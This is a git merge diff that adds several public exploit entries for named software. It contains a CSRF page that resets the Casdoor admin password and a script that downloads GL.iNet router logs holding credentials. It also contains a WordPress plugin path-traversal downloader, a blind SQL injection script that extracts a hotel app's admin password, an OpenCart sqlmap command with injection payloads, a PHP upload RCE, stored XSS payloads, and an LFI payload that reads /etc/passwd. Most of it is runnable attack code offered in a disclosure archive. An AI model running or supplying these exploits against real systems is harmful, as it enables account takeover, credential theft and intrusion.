Merge remote-tracking branch 'upstream/main'

exploits/go/webapps/51961.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
+# Application: Casdoor
+# Version: <= 1.331.0
+# Date: 03/07/2024
+# Exploit Author: Van Lam Nguyen
+# Vendor Homepage: https://casdoor.org/
+# Software Link: https://github.com/casdoor/casdoor
+# Tested on: Windows
+# CVE : CVE-2023-34927
+
+Overview
+==================================================
+Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
+This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
+
+Proof of Concept
+==================================================
+
+Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
+
+<html>
+<form action="http://localhost:8000/api/set-password" method="POST">
+    <input name='userOwner' value='built&#45;in' type='hidden'>
+    <input name='userName' value='admin' type='hidden'>
+    <input name='newPassword' value='hacked' type='hidden'>
+    <input type=submit>
+</form>
+<script>
+    history.pushState('', '', '/');
+    document.forms[0].submit();
+</script>
+
+</html>
+
+If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
+
+userOwner: built&#45;in
+userName: admin
+newPassword: hacked

exploits/hardware/remote/51942.py

@@ -0,0 +1,79 @@
+# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
+# CVE: CVE-2024-27356
+# Google Dork: intitle:"GL.iNet Admin Panel"
+# Date: 2/26/2024
+# Exploit Author: Bandar Alharbi (aggressor)
+# Vendor Homepage: www.gl-inet.com
+# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
+# Tested Model: GL-X3000 Spitz AX
+# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
+
+import sys
+import requests
+import json
+requests.packages.urllib3.disable_warnings()
+h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
+
+def DoesTarExist():
+    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
+    if r.status_code == 200:
+        f = open("logread.tar", "wb")
+        f.write(r.content)
+        f.close()
+        print("[*] Full logs archive `logread.tar` has been downloaded!")
+        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
+        return True
+    else:
+        print("[*] The `logread.tar` archive does not exist however ... try again later!")
+        return False
+
+def isVulnerable():
+    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
+    if r1.status_code == 500 and "nginx" in r1.text:
+        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
+        if  "Admin-Token" in r2.text:
+            j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
+            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
+            ver = r3.json()['result']['firmware_version']
+            model = r3.json()['result']['model']
+            if ver.startswith(('4.')):
+                print("[*] Firmware version (%s) is vulnerable!" %ver)
+                print("[*] Device model is: %s" %model)
+                return True
+    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
+    return False
+
+def isAlive():
+    try:
+        r = requests.get(url, verify=False, timeout=30, headers=h)
+        if r.status_code != 200:
+            print("[*] Make sure the target's web interface is accessible!")
+            return False
+        elif r.status_code == 200:
+            print("[*] The target is reachable!")
+            return True
+    except Exception:
+        print("[*] Error occurred when connecting to the target!")
+        pass
+    return False
+
+if __name__ == '__main__':
+    if len(sys.argv) != 2:
+        print("exploit.py url")
+        sys.exit(0)
+    url = sys.argv[1]
+    url = url.lower()
+    if not url.startswith(('http://', 'https://')):
+        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
+        sys.exit(0)
+    if url.endswith("/"):
+        url = url.rstrip("/")
+
+    print("[*] GL.iNet Unauthenticated Full Logs Downloader")
+
+    try:
+        if (isAlive() and isVulnerable()) == (True and True):
+            DoesTarExist()
+    except KeyboardInterrupt:
+        print("[*] The exploit has been stopped by the user!")
+        sys.exit(0)

exploits/php/webapps/51937.txt

@@ -0,0 +1,49 @@
+# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
+# Date: 2024-03-06
+# Exploit Author: Ven3xy
+# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
+# Version: 2.7.10
+# Tested on: Linux
+
+import sys
+import requests
+from urllib.parse import urljoin
+import time
+
+def exploit(target_url, file_name, depth):
+    traversal = '../' * depth
+
+    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
+    params = {
+        'page': 'backup_manager',
+        'download_backup_file': f'{traversal}{file_name}'
+    }
+
+    response = requests.get(exploit_url, params=params)
+
+    if response.status_code == 200 and response.headers.get('Content-Disposition') \
+            and 'attachment; filename' in response.headers['Content-Disposition'] \
+            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
+        print(response.text)  # Replace with the desired action for the downloaded content
+
+        file_path = f'simplebackup_{file_name}'
+        with open(file_path, 'wb') as file:
+            file.write(response.content)
+
+        print(f'File saved in: {file_path}')
+    else:
+        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
+
+if __name__ == "__main__":
+    if len(sys.argv) != 4:
+        print("Usage: python exploit.py <target_url> <file_name> <depth>")
+        sys.exit(1)
+
+    target_url = sys.argv[1]
+    file_name = sys.argv[2]
+    depth = int(sys.argv[3])
+    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")
+    time.sleep(5)
+
+
+    exploit(target_url, file_name, depth)

exploits/php/webapps/51938.py

@@ -0,0 +1,83 @@
+# Exploit Title:  Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated)
+# Google Dork: n/a
+# Date: 04/02/2024
+# Exploit Author: Gian Paris C. Agsam
+# Vendor Homepage: https://github.com/projectworldsofficial
+# Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip
+# Version: 1.0
+# Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12
+# CVE : n/a
+
+import requests
+import argparse
+from colorama import (Fore as F, Back as B, Style as S)
+
+BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
+
+parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection')
+parser.add_argument('-u', '--url', help='')
+args = parser.parse_args()
+
+
+def banner():
+    print(f"""{FR}
+      ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄  ▄▄▄        ▪  ·▄▄▄▄
+▪     ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪     ██ ██▪ ██
+ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄  ▄█▀▄ ▐█·▐█· ▐█▌
+▐█▌.▐▌██▌.██▌.▐█▄▪▐█▐█▄▄▌▐███▌██. ██ ▐█•█▌▐█▌.▐▌▐█▌██. ██
+ ▀█▄▀▪▀▀▀ ▀▀▀  ▀▀▀▀  ▀▀▀ ·▀▀▀ ▀▀▀▀▀• .▀  ▀ ▀█▄▀▪▀▀▀▀▀▀▀▀•
+        Github: https://github.com/offensive-droid
+        {FW}
+    """)
+
+
+# Define the characters to test
+chars = [
+    'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
+    'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D',
+    'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S',
+    'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7',
+    '8', '9', '@', '#'
+]
+
+def sqliPayload(char, position, userid, column, table):
+    sqli = 'admin\' UNION SELECT IF(SUBSTRING('
+    sqli += str(column) + ','
+    sqli += str(position) + ',1) = \''
+    sqli += str(char) + '\',sleep(3),null) FROM '
+    sqli += str(table) + ' WHERE uname="admin"\''
+    return sqli
+
+def postRequest(URL, sqliReq, char, position):
+    sqliURL = URL
+    params = {"emailusername": "admin", "password": sqliReq, "submit": "Login"}
+    req = requests.post(url=sqliURL, data=params, verify=False, proxies=proxies, timeout=10)
+    if req.elapsed.total_seconds() >= 2:
+        print("{} : {}".format(char, req.elapsed.total_seconds()))
+        return char
+
+    return ''
+
+def theHarvester(target, CHARS, url):
+    #print("Retrieving: {} {} {}".format(target['table'], target['column'], target['id']))
+    print("Retrieving admin password".format(target['table'], target['column'], target['id']))
+    position = 1
+    full_pass = ""
+    while position < 5:
+        for char in CHARS:
+            sqliReq = sqliPayload(char, position, target['id'], target['column'], target['table'])
+            found_char = postRequest(url, sqliReq, char, position)
+            full_pass += found_char
+        position += 1
+    return full_pass
+
+if __name__ == "__main__":
+    banner()
+    HOST = str(args.url)
+    PATH = HOST + "/hotel booking/admin/login.php"
+    adminPassword = {"id": "1", "table": "manager", "column": "upass"}
+    adminPass = theHarvester(adminPassword, chars, PATH)
+    print("Admin Password:", adminPass)

exploits/php/webapps/51940.txt

@@ -0,0 +1,23 @@
+# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
+# Date: 2024-04-2
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.opencart.com/
+# Software Link: https://github.com/opencart/opencart/releases
+# Version: 4.0.2.3
+# Tested on: XAMPP, Linux
+# Contact: https://twitter.com/dmaral3noz
+* Description :
+Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+* Steps to Reproduce :
+- Go to : http://127.0.0.1/index.php?route=product/search&search=test
+- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
+===========
+Output :
+Parameter: search (GET)
+Type: boolean-based blind
+Title: AND boolean-based blind - WHERE or HAVING clause
+Payload: route=product/search&search=') AND 2427=2427-- drCa
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb

exploits/php/webapps/51943.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
+# Date: 02/04/2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
+# POC:
+1. Here we go to : http://127.0.0.1/fuelflow/index.php
+2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
+3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
+4. Upload the san.php file in "Image" field
+5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
+6. The content of san.php file is given below: <?php phpinfo();?>
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md

exploits/php/webapps/51944.txt

@@ -0,0 +1,20 @@
+# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link:https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
+# Version: v1.0
+# Tested on: Windows 10
+# Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE -
+v1.0 allows an attacker to execute arbitrary code via a crafted payload to
+the Firstname and lastname parameter in the profile component.
+
+# POC:
+1. After login goto http://127.0.0.1/E-Insurance/Script/admin/?page=profile
+2. In fname & lname parameter add payolad
+"><script>alert("Hacked_by_Sandy")</script>
+3. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md

exploits/php/webapps/51945.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: NA
+# Date: 28-03-2024
+# Exploit Author: Sandeep Vishwakarma
+# Vendor Homepage: https://code-projects.org
+# Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/
+# Version: v1.0
+# Tested on: Windows 10
+# CVE : CVE-2024-29412
+# Description: Stored Cross Site Scripting vulnerability in
+Hospital Management System - v1.0 allows an attacker to execute arbitrary
+code via a crafted payload to the 'patient_id',
+'first_name','middle_initial' ,'last_name'" in /receptionist.php component.
+
+# POC:
+1. Go to the User Login page: "
+http://localhost/HospitalManagementSystem-gh-pages/
+2. Login with "r1" ID which is redirected to "
+http://localhost/HospitalManagementSystem-gh-pages/receptionist.php"
+endpoint.
+3. In Patient information functionality add this payload
+"><script>alert('1')</script> ,in all parameter.
+4. click on submit.
+
+# Reference:
+https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md

exploits/php/webapps/51947.txt

@@ -0,0 +1,27 @@
+Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
+Date: 03/28/2024
+Exploit Author: Chokri Hammedi
+Vendor Homepage: https://flarum.org/
+Software Link: https://github.com/FriendsOfFlarum/pretty-mail
+Version: 1.1.2
+Tested on: Windows XP
+CVE: N/A
+Description:
+
+The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure.
+
+Steps to Reproduce:
+
+Log in as an administrator on the Flarum forum.
+
+Navigate to the FoF Pretty Mail extension settings.
+
+Edit the email default template and insert the following payload at the end of the template:
+
+{{ include('/etc/passwd') }}
+
+Save the changes to the email template.
+
+Trigger any action that sends an email, such as user registration or password reset.
+
+The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.